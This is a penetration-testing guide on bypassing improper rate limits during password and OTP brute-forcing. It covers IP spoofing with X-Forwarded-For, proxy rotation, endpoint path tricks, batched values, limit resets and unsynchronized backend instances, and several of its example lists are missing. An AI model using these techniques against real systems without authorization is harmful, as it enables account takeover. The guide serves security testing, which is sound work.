Improper Rate Limits
A rate limit is used to bandwidth throttling and/or a limit on the number of attempts, for instance, when checking passwords or OTP. If the lack of rate limit, it becomes possible to send an arbitrary number of requests.
If the established restrictions are violated, an application may return
429 Too Many Requestsor
200 OKwith an error in the response body. However, an application may not change the HTTP code and response body, thus creating the appearance of a lack of rate limit. In some cases you can verify this behavior by entering a valid value, for instance, valid password or OTP, thus simulating the final result of bruteforce.
Rate limit algorithms can only respond to how many requests were made in a certain period of time. If you try to send requests using n-threads, rate limit algorithm will throttle the bandwidth. To avoid this behavior, you should send requests using a single thread and possibly even with a delay between requests.
Many rate limit algorithms rely on a client IP address when deciding to block a request. If you change the IP address or make a server think that the request came from another IP, you will successfully bypass this restriction.
If an application relies on the value of HTTP headers to determine an original IP address of a client, you can try to override IP address with the following headers:
For instance, you can add the
X-Forwarded-Forheader to the OTP check request:
POST /api/v1/otp/check HTTP/1.1
You can use a proxy or VPN to change an IP address. To automate the change of IP addresses, use the following methods:
- A ready-made or self-written script with a large number of proxy servers or VPNs.
Try to change an endpoint path to bypass rate limits. Use different case or add extra symbols, such as
%20, etc. For instance, if a bare endpoint is
/api/v4/endpoint, try the following endpoints:
Also, you can try to add extra parameters, for example,
When brute-force, try passing several values in one request at once, for instance:
An application can correctly process such requests and interpret this as one attempt, which will significantly expand the number of possible attempts.
An application can implement different rate limits for authenticated and unauthenticated users. For instance, after authentication, there may be no rate limits on attempts to change a password or disable two-factor authentication.
An application may incorrectly implement rate limits or have a logical vulnerability that allows a user to reset the limits.
For example, an application may reset limits on attempts to send OTP when you resend a new OTP, so you can reset rate limits before each OTP check attempt and a rate limit will be never reached. Or an application may store the remaining number of attempts in a cookie, and you can reset the limit by spoofing the cookie.
Often, an application backend is deployed on multiple instances that run in parallel. Accordingly, when a client sends a request to the backend, a balancer ties a user's session to a specific instance. This can be accomplished by setting a custom HTTP header or cookie with an instance ID. If rate limit values are not synchronized between instances, you can increase the number of available attempts by sending requests to different instances. In order to find out existing IDs, try to send requests to the backend from different IPs and without the header or cookie. A balancer will assign a random instance and return it in the header or cookie for such requests.